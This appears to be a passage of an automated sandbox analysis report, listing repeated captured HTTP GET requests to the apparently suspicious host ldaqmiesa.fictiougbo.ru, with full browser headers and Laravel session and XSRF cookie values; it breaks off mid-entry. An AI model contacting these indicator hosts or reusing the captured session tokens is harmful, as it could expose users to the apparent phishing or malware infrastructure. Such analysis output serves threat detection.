              Source: global trafficHTTP traffic detected: GET /klwMHwMulA2IdrzZU0QtBhWShAoI2kvmGDklGbE89EI3rMX7NvvZVCwuBCMZP9iuv220 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxALWfU5ETUyvmQJOvfdzop4iZ3aSLxoCsT4Kvw12129 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klNmSZj35YUESegMa2KJQwG9kOMxhlMosJqr6yggUDmkVVSKSRLtLLeAOFHaxiYTV1ab225 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrd3XcgHAY2iNoCw03ad8wRPB3hghHyTZBXwAL2gJj5wQCEWF45131 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klwMHwMulA2IdrzZU0QtBhWShAoI2kvmGDklGbE89EI3rMX7NvvZVCwuBCMZP9iuv220 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mn4fJ2HLn9Uw3VPFMSNDf0KbvFvrkDMNBQbij1JmwKhaOhuNTlOHiBbeg8Y78147 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imx5N3duNVd4NmYrT0NxZ1J5SDBNd0E9PSIsInZhbHVlIjoiZFVhdDhOaVNycEV4VmJDTWFVRjJ6RGE0c01JS1k5L3lpSGw4WFl3c0k1NXRjbDcvQlRBaGQxQ3FqY0wvdWdmdDVPczUrcU1BRnNtSklWTUJVUlpKeXAxbE5CRExSQUhpc1RhRm5xQUZ0WC9HLzJFRXlPMUduUHNCY3RsYmR2RnUiLCJtYWMiOiIzZGRkN2MyOTJlN2I2NWUwOWMzZTk5YmNiYjA1YzFiNWI5ZWI4NzA0ODA1YWY0MWY4MjUxZjI1ZDZhMjMyMWVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZLejJGTUhYVDkvM3VWcG5qdzRwVVE9PSIsInZhbHVlIjoiRW8vZVpHRmhzUWtYcHVlSU9sM3c3d2VZQVdjbzFQK3hmcmIvWm9OMEkzak9tQU4xMFpxemw4ZGxFOWpOb1J0VzBRWVd1eTkwTE9CcTRUT3IvamxDS1VTeTEyb0tBRVlLbW1NS20yRy84bEl2STliYVZRWGNYdGpWa2VUVUlBeTUiLCJtYWMiOiI3MTNmMzNhNjM1NWYzZDY4M2Y1N2U5OGE5ODE3MjdlYmE2ZWJlZmI1OWY0MWM5YWFkZTc1NzBkMzUyNTc1MTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /lbbzFU9cG7n956YbztDc1aduPhkbdvMLKCBqlIVYQkaAGLd0t HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijQDIZUpIw7NnlvkASolZQ1B813ohEwMWz7wxvtWcYNm6mkgDmm78170 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzgiJjBin2JwCe25de92rsEYISnLKKsSibuk7vo90174 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrd3XcgHAY2iNoCw03ad8wRPB3hghHyTZBXwAL2gJj5wQCEWF45131 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /optp7gQK5lVR4zdBP02eR21a0IaWJZ3htroKGmT7ughSgaEmy3tAcDRKML6Qep8rCef200 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxALWfU5ETUyvmQJOvfdzop4iZ3aSLxoCsT4Kvw12129 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijgQ0CVymhNkpYAfOoHIbpxyN6zyB2A8J0jKAEoibCiGg12203 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijQDIZUpIw7NnlvkASolZQ1B813ohEwMWz7wxvtWcYNm6mkgDmm78170 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 